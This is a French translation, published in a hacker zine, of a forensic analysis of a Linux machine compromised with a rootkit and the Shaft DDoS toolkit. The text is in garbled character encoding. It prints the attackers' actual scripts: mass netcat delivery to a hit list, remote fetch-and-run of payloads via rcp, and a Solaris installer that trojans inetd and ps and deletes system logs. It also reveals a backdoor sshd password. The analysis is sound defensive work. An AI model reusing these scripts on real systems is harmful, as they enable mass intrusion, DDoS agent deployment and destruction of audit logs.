Une fois alertщe qu'une machine aurait pu ъtre compromise, nous avons exщcutщ un scan sur la machine et le rщseau. Un scanner de port (nmap) nous rщvшle que le port 5002/tcp est ouvert en щcoute. En outre, il rщvшle que le port 22/tcp (ssh) est aussi ouvert, lequel n'avait pas щtщ installщ pas l'administrateur.
Une machine sur laquelle щtait basщe l'analyse a indiquщ pareillement que le port 5002/tcp щtait en щcoute. Une analyse avec rpm -Va rщvшle une diffщrence de taille et de somme MD5 pour les composants du kit root (ensemble de programme qui permette d'administrer le serveur: ls, ps, grep, find...), mais ne rщvшle pas la prщsence de l'outil Shaft. Actuellement le systшme a щtщ dщconnectщ du rщseau et le disque a щtщ montщ dans un autre systшme de confiance et sera analysщ d'ici.
Les administrateurs locaux avaient notщs que le systшme щtait devenu instable р la fin de l'automne, correspondance aux essais de l'outil DDoS Shaft.

Le Rootkit Utilisщ

Qu'avons nous trouvщ

Nous avons trouvщ des choses significatives tandis que nous analysions la boюte qui щtait en fait un rщpertoire et des fichiers que j'appellerai le toolkit sda69. Il щtait dans /dev (/dev/sda69 et 4 fichiers sda69[a-d]). Ceci semble ъtre le rщpertoire de travail de l'attaquant, ainsi la plupart des scripts et fichiers sont stockщs ici.
Il apparaюt un ancien travail sur une pщriode ou le systшme щtait compromis, la boюte a щtщ stockщe dans un sous-rщpertoire appelщ ". " (espace point, "/dev/sda69/. "). Ce rщpertoire a contenu 6 fichiers qui ont compromis le systшme, pour renifler (sniffer) le rщseau Ethernet et analysщ les fichiers journaux des renifleur (sniffer). Voici une liste des fichiers et de ce qu'ils font :

rwxr-xr-x 1 0 20 28969 Apr 4 1999 idle

C'щtait leur renifleur(sniffeur). Il a щtщ conчu pour renifler les ports 21/tcp et 23/tcp (ftp et telnet, respectivement). Il capturait le premier nombre de X octets de chacune des connexions, les inscrivaient dans un fichier, et passait р la prochaine connexion. il a щtщ employщ pour recueillir des mots de passe, puisque les services ftp et telnet reчoivent des mots de passe en clair. Ce renifleur a щtait seulement dirigщ dans une seule direction ( de la machine qui a commencщ la connexion р la machine de destination). Ceci щtait fait de cette faчon parce que l'autre direction ne contient rarement d'information utile. le fichier de sortie щtait dans ce cas-ci tcp.log. Le programme a щtщ appelщ idle probablement pour duper n'importe quel admin systшme qui pouvez le remarquer par la commande ps et penser que c'щtait juste un idle time.
-rw-r--r-- 1 0 0 456799 Jun 11 1999 tcp.log
C'щtait le fichier journal du (renifleur) sniffer. Il contenait les donnщes dans la forme :
src_ip => dst_ip [port] les donnщes
...
----mщthode d'arrъt de connexion

Ce journal contenait l'information pour les ports 21 et 23. Et щgalement les identifiants et les mots de passe.

-rwxr-xr-x 1 0 0 2795 May 12 1999 pp.pl

Ce script perl extractait les noms d'utilisateurs et les mots de passe depuis le fichier journal du sniffer.
-rw-r--r-- 1 0 0 6 Apr 28 1999 sniff.pid
C'est un fichier standard contenant le pid du sniffer.
-rw-r--r-- 1 0 20 7654 Apr 4 1999 s
Un simple programme de SYN Flood (inondation de rщseau par l'envoie de SYN)
-rwxrwxr-x 1 0 0 7656 Aug 28 1998 chattr
Ceci est un programme chattr standard sur linux (permet de changer les attributs d'un fichier sur un systшme de fichier ext2fs)
l'ensemble de ces logiciels dans ". " prouve que les attaquants ont utilisщs cette boюte pour le reniflement des mots de passe du rщseau Ethernet. Nous ne savons pas actuellement si les attaquants faisaient autre chose pendant cette pщriode de temps (Mai-Juin 1999).

Cheval de troie trouvщ sur Linux

La recherche sur la machine Linux compromise a rapportщ les chevaux de Troie suivants. Ils ont щtщ trouvщs en montant le disque en lecture seul et sans les permissions d'exщcution sur les fichiers. Une liste rщcursive de fichier a щtщ alors exщcutщe (LS - lartRi /mnt) qui a rapidement indiquщ les chevaux de Troie suivants :

20563 -rwxrwxr-x 1 root root 437428 Sep 15 1998 vi
20554 -rwxrwxr-x 1 root root 262756 Oct 2 1998 tcsh
313370 -r-xrwxr-x 1 root root 31312 Oct 3 1998 ps

L'examen des fichiers binaires en utilisant la commande strings (analyse du fonctionnement d'un binaire), ainsi que des fichiers additionnels sur le systшme, ceci a permis de comprendre le mode de fonctionnement des nouveaux binaires.
Les tailles de fichier щtaient parfois trшs grandes, trшs probablement en raison d'un lien statique avec une bibliothшque C ancienne (libc5 sur un systшme libc6).
Sur une machine courante, l'examen en employant la commande RPM dans le mode vщrification (RPM -Va) affichait des tailles de fichiers, des permissions et des sommes MD5 inexistantes une fois comparщes р la base de donnщes du systшme.
ls
Le cheval de Troie LS que nous avons trouvщ a pour effet de ne pas щnumщrer les fichiers cachщs de configuration, /dev/sda69c. En tant que tels, il est fortement extensible. Plusieurs utilitaires ont щtщ cachщs, y compris des щlщments du toolkit Shaft et mъme quelques terminaux.
netstat
L'examen du binaire en remplacement de netstat indique qu'il щtait employщ р cacher les connexions depuis certains rщseaux et sur certains ports. Des rщseaux et des ports ont щtщ configurщs en utilisant le fichier /dev/sda69b, en complщment du rootkit.
ps
Utilisщ pour cacher l'activitщ. Le cheval de Troie ps(1) fait rщfщrence au fichier /dev/sda69a, qui contient une liste des processus et des terminaux р cacher. Une liste assez typique de rootkit, y compris des renifleurs, analyseurs, le script de l'IRC eggdrop, et le backdoor sshd.
updatedb
Le programme updatedb, normalement met р jour la base de donnщes de slocate (version sщcurisщe de la commande locate) qui permet de localiser un fichier sur un disque, celui ci a щtщ remplacщ par un script shell. Encore une fois, utilisщ pour cacher les outils du rootkit.
locate
Semblable р l'updatedb trojan, utilisщ pour cacher le rootkit et le toolkit Shaft.
find
Encore, utilisщ pour cacher les toolkits, appelle le fichier /dev/sda69c d'une maniшre semblable р la commande LS version cheval de Troie pour cacher des fichiers.
dir vdir
Voir LS version cheval de Troie, utilise le mъme mode de fonctionnement.
killall
Appels /dev/sda69a, qui contient une liste des processus et terminaux. Utilisщ pour empъcher de stopper les processus de l'intrus.
syslogd
Appels /dev/sda69d, contient une liste de domaines. Vraisemblablement elle empъche la journalisation quand les machines de ces domaines se connectent.
tcpd
Modification du wrapper TCP, appel /dev/sda69b et empъche les vщrifications d'accшs sur ces rщseaux et sur ces ports.
inetd
Semble ъtre un dщmon combinщ entre portmapper et inetd, peut-ъtre pour permettre l'accшs ou des commandes systшme par l'intermщdiaire d'appels RPC.
sshd
Le cheval de Troie sshd 1.2.26. Contient un mot de passe en backdoor "rOOTkIT" qui offre un accшs shell root sans journal.
ifconfig
Remplace l'ancien, dans cette version il omet d'afficher le rщsultat du paramшtre PROMISC (mode promiscous, voir article sur les sniffeurs pour plus d'info), cachant ainsi l'utilisation du logiciel de reniflement.

Cheval de Troie trouvщ sur Solaris SPARC
Pendant notre recherche sur le toolkit, nous avons щgalement trouvщ plusieurs binaires clщs pour Solaris qui ont щtщ remplacщs par des chevaux de Troie. Avec les archives (neet.tar) il y a un script et plusieurs binaires pour l'architecture SPARC. Le script installe des chevaux de Troie de type inetd, ps et update.
-rwx------ 1 510 510 39544 Mar 18 1999 doc
Ceci est apparemment le cheval de Troie pour le binaire inetd sur SPARC Solaris
-rwx------ 1 510 510 24356 Mar 18 1999 ps
Ceci est apparemment le cheval de Troie pour le binaire ps sur SPARC Solaris
-rwx------ 1 510 510 25548 Mar 18 1999 update
Solaris n'emploie pas update, bien que SunOS 4.x l'utilise. Ceci est probablement fait pour embrouiller l'administrateur s'il tombe sur ce fichier. Selon George Weaver ceci est un solsniffer standard, un renifleur Solaris. On s'attend р ce que les fichiers journaux soient dans /usr/man/tmp/output sur un systшme Solaris infectщ.

Fichier de configuration pour les chevaux de Troie exщcutables
En complщment de ces fichiers, ont a rщcupщrщs quatre fichiers supplщmentaires dans lesquels apparaissent des informations employщes par le rootkit qui a щtщ installщ sur ce systшme. Ces fichiers sont dans /dev/sda69[a-d ]. Voici une liste de ce qui est contenu dans ces fichiers:
sda69a
Le fichier a le format :

numщro nom

Les numщro indique quel type d'information est р sa suite (toujours 1 ou 3) et le nom indique les donnщes. Pour ce fichier, 1 indique que ce qui suit est le nom d'un terminal, et 3 indique que ce qui suit est le nom d'un exщcutable. Ce fichier est employщ par le cheval de Troie ps et killall pour empъcher le sysadmin de voir ou de tuer les exщcutables щnumщrщ р la suite.
Le contenu du fichier:

3 egg
3 linsniffer
1 p0
1 p1
3 sniffer
3 mscan
3 bash
3 idle
3 screen
3 ssynk4
3 sshd
3 ssh
3 sshd1
3 s

sda69b
Le format de ce fichier est le mъme que le format de sda69a, mais le contenu diffшre. Le 1 signifie dans ce cas-ci que les donnщes sont un sous-rщseau р ignorer. Le 3 est dans ce cas-ci un numщro spщcifie de port. Ce fichier est employщ par le cheval de Troie netstat et tcpd pour connaюtre quelle IP cachщe, quelle IP doit ъtre toujours laisser dedans, et quel port cacher.
Un exemple du contenu :
1 xxx.
3 6667
1 yyy.
3 23
1 zzz.
1 ddd.eee
1 ccc.
3 513
1 bbb.aaa.
3 22

Ici, les trois combinaisons de lettres reprщsentent des nombres simples d'adresses IP. Ce fichier indiquerait que tout le monde pour xxx.*.*.* seront accepter sur cette machine, et qu'aucun connexion depuis cette IP n'apparaюtra dans netstat. En outre, les programme d'щcoute sur les ports 6667, 23, 513, et 22 (irc, telnet, rlogin, et ssh) n'apparaюtront pas dans un netstat normal.
sda69c
Ce fichier est une liste de fichiers, un fichier par ligne, qui ont щtщ installщs sur ce systшme par les attaquants. Ce fichier est employщ par ls, dir, vdir, et find pour savoir quels fichiers ne pas щnumщrer quand l'admin affiche le contenu du disque.
sda69d
Ce fichier est une liste de fournisseurs (providers), un par ligne. Ce fichier est employщ par le cheval de Troie syslog pour connaюtre quels messages ne devraient pas ъtre journalisщs.

La mщthode pour distribuer l'outil Shaft
Les travaux rщcents des pirates (qui incluent l'outil de DDoS Shaft) sont tous dans le rщpertoire de base sda69 (/dev/sda69). Voici une liste de fichiers rщcupщrщe et leur fonctions:

-rwxr-xr-x 1 0 0 25123 Nov 28 14:34 shaftmaster
-rwxr-xr-x 1 0 0 15184 Nov 28 14:47 shaftnode

C'est le maюtre et les exщcutables de noeud (appelщ aussi agent) pour l'outil de DDoS Shaft. Pour plus l'information, voir le texte d'analyse de Shaft.

-rwxr-xr-x 1 0 0 19806 Nov 28 14:41 shaftnode.c

C'est le fichier de source pour l'agent de Shaft. Pour plus d'information, voir le texte d'analyse de Shaft.

-rwxr-xr-x 1 0 0 165632 Nov 28 16:34 nc

Ceci semble ъtre le netcat standard. Cet exщcutable щtait utilisщ par les scripts pour exщcuter р distance des commandes.

-rw-r--r-- 1 0 0 596 Nov 28 17:12 hitlist

Ce fichier contient une liste de machines cibles, une machine par la ligne. Celle-ci щtaient щvidemment les cibles qui recevaient le programme shaftnode, la cible ayant щtait prщcщdemment compromise (piratщe).

-rwxr-xr-x 1 0 0 84 Nov 28 16:36 dos.sh

Ce shell script exщcutent la commande dospipe.sh et envoient la sortie de chaque IP dans le fichier hitlist, port 21 (ftp). Ce script est un wrapper pour dospipe.sh lequel l'exщcute pour chacune des machines contenu dans hitlist et l'envoie р la machine. Voici le code de ce fichier:
#!/bin/sh
for i in `cat hitlist` ; do (./dospipe.sh | ./nc -p 53982 $i 21 &) ; done

-rwxr-xr-x 1 0 0 186 Nov 28 16:41 dospipe.sh
Ce script shell produit une sщrie de commandes qui sont prщvues pour tщlщcharger et exщcuter une copie de leur shaftnode sur la machine cible. Ce script automatise le processus de tщlщchargement et d'exщcution de leur agent.
Voici le code du script:
#!/bin/sh
echo "oir##t"
echo "QUIT"
sleep 5
echo "cd /tmp"
sleep 5
echo "rcp user@host:shaftnode ./"
sleep 5
echo "chmod +x shaftnode"
sleep 5
echo "./shaftnode"
echo "exit"

Les premiшres couples de lignes (les deux premiшres commandes d'щcho) semblent signifier qu'un backdoor est employщ sur les serveurs ftp des machines cibles pour obtenir le rootshell qu'ils ont besoin. Les deux premiшres lignes sont envoyщes au cheval de Troie qui р pour fonction d'ъtre serveur de ftp, et les lignes suivantes semblent ъtre des commandes d'envoient р un root shell.

-rwxr-xr-x 1 0 0 122880 Oct 24 02:13 duh.tar

C'est un fichier tar qui contient cinq fichiers: bd.sh, bdpipe.sh, massbd.sh, need.tar et unf.

-rwxr-xr-x 1 0 0 104 Oct 24 01:55 unf

Ce fichier est une autre liste d'adresse IP, vraisemblablement une liste de cible pour la "bd" du systшme.

-rwxr-xr-x 1 0 0 10240 Oct 24 02:11 bd.sh

En dщpit de son extension, c'est un fichier tar contenant deux fichiers bdpipe.sh et massbd.sh. Je pense que l'existence de ce fichier tar est une erreur et cela devrait ъtre un script shell qui ressemble au script dos.sh.

-rwxr-xr-x 1 0 0 53 Aug 7 1999 massbd.sh

C'est un script shell qui rщitшre de bout en bout les lignes d'un fichier et exщcute les scripts bd.sh sur chacun d'eux en tache de fond. Ceci signifie qu'il exщcute bd.sh sur chacune des lignes dans le fichier en mъme temps. A supposer que le fichier unf de fichier est employщ р cette fin. Voici le code pour ce script:
#!/bin/sh
for i in `cat $1`; do (./bd.sh $i &);done

-rwxr-xr-x 1 0 0 192 Aug 8 1999 bdpipe.sh

C'est un fichier qui est employщ pour tщlщcharger et installer les chevaux de Troie et le rootkits sur une machine SPARC, il sert aussi р l'effacement des journaux. Il copie neet.tar sur la machine cible, exщcute le script bd, et nettoie ses traces. Voici le code pour le script:
#!/bin/sh
echo "cd /tmp;"
echo "rcp user@host:neet.tar ./;"
sleep 4
echo "tar -xvf neet.tar;"
sleep 4
echo "./bd;"
sleep 10
echo "rm -rf neet.tar bd update*;"
sleep 10
echo "exit;"

Il s'avшre qu'ils ont dщjр un accшs root shell avant que ce script soit exщcutщ. Obtenir le root shell a pu trшs bien ъtre le contenu du vrai bd.sh.

-rwxr-xr-x 1 0 0 102400 Aug 7 1999 neet.tar

C'est un fichier tar qui contient 4 fichiers : bd (un script shell), ps, update, et doc (trois exщcutable SPARC)

-rwx------ 1 510 510 1076 Aug 5 1999 bd

C'est un script shell exщcutable qui est exщcute par un autre script une fois que le systшme est compromis. Ce script fait un certain nombre de choses. La premiшre est de copier le cheval de Troie version inetd. Deuxiшmement il supprime la plupart des fichiers journaux sur le systшme qui pourrait l'impliquer. Ensuite il exщcute le cheval de Troie inetd et il le test avec une session telnet (vraisemblablement pour tester le backdoor). Ensuite il tue inetd, nfs et ttdb. A la suite il exщcute le programme update. Finalement il copie le programme ps en remplacement de la version actuelle.
Voici le code source complet du script:
unset HISTFILE; unset SAVEHIST
cp doc /usr/sbin/inetd;
chown root /usr/sbin/inetd;
chgrp root /usr/sbin/inetd;
touch 0716000097 /usr/sbin/inetd;
rm -rf doc /tmp/bob /var/adm/messages /usr/lib/nfs/statd /usr/openwin/bin/rpc.ttdb* /usr/dt/bin/rpc.ttdb*
rm -rf /var/log/messages /var/adm/sec* /var/adm/mail* /var/log/mail* /var/adm/sec*
rm -rf /usr/openwin/bin/rpc.cmsd
rm -rf /usr/dt/bin/rpc.cmsd
/usr/sbin/inetd -s;
/usr/sbin/inetd -s;
telnet localhost;
/usr/sbin/inetd -s;
ps -ef | grep inetd | grep bob | awk '{print "kill -9 " $2 }' > boo
chmod 700 boo
./boo
ps -ef | grep nfs | grep statd | awk '{print "kill -9 " $2 }' > boo
chmod 700 boo
./boo
ps -ef | grep ttdb | grep -v grep | awk '{print "kill -9 " $2 }' > boo
chmod 700 boo
./boo
rm -rf boo
mkdir /usr/man/tmp
mv update ps /usr/man/tmp
cd /usr/man/tmp
echo 1 \"./update -s -o output\" > /kernel/pssys
chmod 755 ps update
./update -s -o output &
cp ps /usr/ucb/ps
mv ps /usr/bin/ps
touch 0716000097 /usr/bin/ps /usr/ucb/ps
cd /
ps -ef | grep bob | grep -v grep
ps -ef | grep stat | grep -v grep
ps -ef | grep update

Ce que vous pouvez faire
Nous avons, nous espщrons, dщcrits des mщthodes pour les administrateurs d'examiner un systшme compromis par les distributeurs de l'outil de DDoS Shaft. La combinaison d'un rootkit gщnщrique ainsi que le paquage de DDoS crщe un groupe de machines qui pourraient ъtre utilisщes pour perturber les segments d'un grand rщseau.
La chose la plus importante est qui a щtait р plusieurs reprise rщpщtщe -- appliquer les patchs de sщcuritщ des fournisseurs pour mettre р jour et conserver un sytшme sain. Renforcer les accшs, rechercher les trous de sщcuritщ sur les sites spщcialisщs et fabriquer les patchs avant qu'il ne soit fournis par le fournisseur. Cette simple action aurait permis d'empъcher certains agents de s'installer sur votre systшme.
Deuxiшmement, n'importe quel administrateur systшme aurait notщ la dщgradation de la machine sans aucune raison apparent. Les administrateurs locaux de ce rщseaux se sont plaints d'accidents et de problшmes d'exщcution de ce serveur. La encore, les administrateurs n'щtaient pas qualifiщs. C'est un problшme standard, et cela peut ъtre facilement щvitщ en formant ou en employant des administrateurs compщtents.
Alors que les щtapes que nous avons dщcrites en haut sont trшs au-dessus du niveau d'un administrateur systшme et des bases de l'administration, la prщvention contre ce genre de piratage est facilement faisable. N'importe quelle sociщtщ devrait faciliter la diffusion des patches et des recommandations de sщcuritщ venants des fournisseurs.
Comme notщ dans l'introduction, nous avons essayщ de contacter les administrateurs des domaines щnumщrщs dans les listes des cibles fournies dans les toolkit ou depuis les disques oљ les intrus se sont connectщs. Nous fournissons cette analyse р la communautщ dans un effort de faciliter le nettoyage des anneaux d'intrusions. Ils se rщpandent dans le monde entier, y compris l'Europe et en Asie, se concentrant en grande partie sur des institutions scolaires. Nous avons apprщciщ la rщponse de la communautщ une fois entrщ en contact avec eux, et apprecier leur aide pour certains cas.
Un remerciement spщcial р George Weaver du PSU pour son analyse sur les chevaux de Troie trouvщs sur le systшme SPARC.
Original, du 26 mars 2000 :
Rick Wash
rlw6@po.cwru.edu
Jose Nazario
jose@biocserver.cwru.edu
Note: l'original de ce fichier peut-ъtre trouvщ sur: http://biocserver.cwru.edu/~jose/shaft_analysis/
Traduit par Cakeii le 7 avril 2000

Selection de References

Dietrich, Sven: Analyse de Shaft: http://sled.gsfc.nasa.gov/~spock/shaft_analysis.txt nmap http://www.insecure.org/nmap netcat ftp://coast.cs.purdue.edu/pub/tool/unix/netcat

ЄКА`АКЄј,ИИ,јЄКА`АКЄј,ИИ,јЄКА`АКЄј,ИИ,јЄКА`АКЄКА`АКЄј,ИИ,јЄКА`АКЄј,ИИ,јЄКА`АКЄј,ИИ Voilu c'est fini pour cette edition du hackoff22 sortie vachement plus tard que prevu. Merci a g3n0c1d3, Gard, Jericho, Cakeii pour leur participation active et merci a tous les autres qui nous lisent et ne manquent pas de nous faire corriger nos erreurs (de syntaxe). Que la bande passante soit avec vous. Tobozo ________________________________________________________________________________ ЌЎЏАБВГДЕЗИЙКЛПјиоўцЁЂЃЄЅ ІЇЈЉЊЋЌЎЏАБВГДЕЗИЙКЛПјиоўцЁЂЃЄЅ ІЇЈЉЊЋЌЁЂЃЄЅ ІЇЈЉЊЋЌ ЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏ -{\________________________/}- ~~ ~~ ~~ ~~АКијІ П H A C K 0 F F ? ІјиКА~~ ~~ ~~ ~~ ~~ ~~ ~~ ~~ ~-{/ЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏ\}-~ ~~ ~~ ~~ ~~ ~~ ~~ ~~ ~~ ~ http://come.to/legang ~~ ~~ ~~ ~~ ~~ ~~ ~~ ~~ ~~ ~~ ~ ~ ~~ ~~ ~~ ~~ ~~ ~~ ~~ ~~ ~~ http://come.to/illegoland ~~ ~~ ~~ ~~ ~~ ~~ ~~ ~~ ~ ~ ~~ ~~ ~~ ~~ ~~ ~~ ~~ ~~ http://lasavate.tripod.com ~~ ~~ ~~ ~~ ~~ ~~ ~~ ~ ~ ~~ ~~ ~~ ~~ ...Des commentaires, des questions, des insultes, ecrivez aux membres du gang... _________________________________________________________________________________ ЌЎЏАБВГДЕЗИЙКЛПјиоўцЁЂЃЄЅ ІЇЈЉЊЋЌЎЏАБВГДЕЗИЙКЛПјиоўцЁЂЃЄЅ ІЇЈЉЊЋЌЁЂЃЄЅ ІЇЈЉЊЋЌ ЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏ ,јЄКА`АКЄј,ИИ,јЄКА`АКЄј,ИИ,јЄКА`АКЄј, _____________________________________ ((((((( H@CK-OFF !! )))))))) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~ ~ ЄКА`АК ЄКА`АК ЄКА`АК ~ ~ ~ ~ | SE | - | RI | - | AL | ~ ~ ~ ~ | SA | - | VA | - | TE | ~ ~ ~ ~ | SY | - | ST | - | EM | ~ ~ ~ ~ ј,ИИ,ј ј,ИИ,ј ј,ИИ,ј ~ ~ Cakeii - Tobozo - herts - Silk - Nk Sniffdoz - Gard - n0kia - Misto - Blured ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ { \|/ >http://come.to/legang 8 -- * -- >silk@silk.cut { /|\ >cakeii@usa.net tobozo@biosys.net misto@bigfoot.com gard@gardworld.inc hertz@webmails.com n0kia@rootmail.com jericho@altranet.fr blured75@hotmail.com јЄКА`АКЄј,ИИ,јЄКА`АКЄј,ИИ,јЄКА`АКЄј, / O o O o O o \ \ O O O / КЄј,ИИ,јЄКА`АКЄј,ИИ,јЄКА`АКЄј,ИИ,јЄК ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [EOF]